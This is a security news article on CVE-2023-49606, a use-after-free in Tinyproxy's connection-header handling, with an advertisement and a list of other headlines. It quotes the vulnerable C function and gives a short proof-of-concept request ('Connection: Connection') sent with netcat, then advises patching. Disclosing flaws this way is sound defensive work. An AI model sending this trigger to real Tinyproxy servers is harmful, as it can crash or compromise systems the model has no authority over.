Tinyproxy Flaw Let Attackers Execute Remote Code

A security flaw has been identified in Tinyproxy, a lightweight HTTP/HTTPS proxy daemon widely used in small network environments.

The vulnerability, cataloged under CVE-2023-49606, allows remote attackers to execute arbitrary code on the host machine.

This flaw poses a critical risk as it could enable attackers to gain unauthorized access to network resources, potentially leading to further exploitation of internal systems.

Tinyproxy is designed to be a minimalistic proxy solution, which makes it popular in environments where system resources are limited and a full-featured proxy would be impractical.

Document

Integrate ANY.RUN in Your Company for Effective Malware Analysis

Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:

  • Real-time Detection
  • Interactive Malware Analysis
  • Easy to Learn by New Security Team members
  • Get detailed reports with maximum data
  • Set Up Virtual Machine in Linux & all Windows OS Versions
  • Interact with Malware Safely

If you want to test all these features now with completely free access to the sandbox:

Despite its benefits, this vulnerability highlights a severe risk of its deployment, especially in security-sensitive environments.

CVE-2023-49606 – HTTP Connection Headers use-after-free vulnerability

The vulnerability stems from improper memory handling within Tinyproxy’s HTTP request parsing mechanism.

Attackers can exploit this flaw by sending specially crafted HTTP requests to the affected server.

This triggers a buffer overflow or a use-after-free error, leading to arbitrary code execution under the privileges of the Tinyproxy process.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.

Tinyproxy does exactly that in the remove_connection_headers() function:

static int remove_connection_headers (orderedmap hashofheaders)
          {
                  static const char *headers[] = {
                          "connection",
                          "proxy-connection"
                  };
                  for (i = 0; i != (sizeof (headers) / sizeof (char *)); ++i) {
                          /* Look for the connection header.  If it's not found, return. */                          data = orderedmap_find(hashofheaders,headers[i]);                       (1)
                          if (!data)
                                  return 0;                                                         (2)
                                                   ...       
                          ptr = data;                
                          while (ptr < data + len) {
                                  orderedmap_remove (hashofheaders, ptr);                          (3)
                                                                        ...       
                          }
                          /* Now remove the connection header it self. */                          orderedmap_remove (hashofheaders, headers[i]);                           (4)
                               }
                               return 0;
          }

Exploit Proof of Concept

As mentioned, the PoC for the vulnerability is a very simple HTTP request. One variation is:

GET / HTTP/1.1

 Connection: Connection

 Host: 192.168.86.166:8000

Assuming there is an actual host at 192.168.86.166:8000, one can do:

 cat heap-uaf.poc | nc 127.0.0.1 8888

With the relevant tinyproxy.config being:

Port 8888

 Listen 127.0.0.1

 The issue was first reported by the Cisco Talos Intelligence Group, which regularly scans popular open-source software for security vulnerabilities.

Following the discovery, patches and updates were swiftly released to mitigate the risk.

Users of Tinyproxy are urged to update to the latest version to protect against potential exploits.

Mitigation and Recommendations

For network administrators and users of Tinyproxy, it is crucial to apply the security patches provided by the developers immediately.

Additionally, monitoring network activity for any unusual behavior that might indicate an attempt to exploit this vulnerability is recommended.

Organizations should also consider implementing additional security measures such as intrusion detection systems (IDS) and regular security audits to protect their networks further.

Given the nature of this vulnerability, it is also advisable to restrict the network access to Tinyproxy servers, ensuring that only trusted devices can communicate with the proxy.

While Tinyproxy offers significant advantages for small networks, this incident reminds us of the importance of maintaining up-to-date security practices, even in less resource-intensive applications.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

Junior School Student Indicted for Infecting Computers With Malware

Fukui Prefectural Police have indicted a 15-year-old junior high school student from Saitama Prefecture for…

1 hour ago

Critical Gitlab Vulnerability Let Attackers Escalate Privileges

GitLab, a widely used platform for DevOps lifecycle management, has released critical security updates for…

2 hours ago

Firefox 133.0 Released with Multiple Security Updates – What’s New!

Mozilla has officially launched Firefox 133.0, offering enhanced features, significant performance improvements, and critical security…

6 hours ago

RomCom Hackers Exploits Windows & Firefox Zero-Day in Advanced Cyberattacks

In a new wave of cyberattacks, the Russia-aligned hacking group "RomCom" has been found exploiting…

14 hours ago

Chinese APT Hackers Using Multiple Tools And Vulnerabilities To Attack Telecom Orgs

Earth Estries, a Chinese APT group, has been actively targeting critical sectors like telecommunications and…

16 hours ago

200,000 WordPress Sites Exposed to Cyber Attack, Following Plugin Vulnerability

A critical security vulnerability has been discovered in the popular WordPress plugin Anti-Spam by CleanTalk, which…

21 hours ago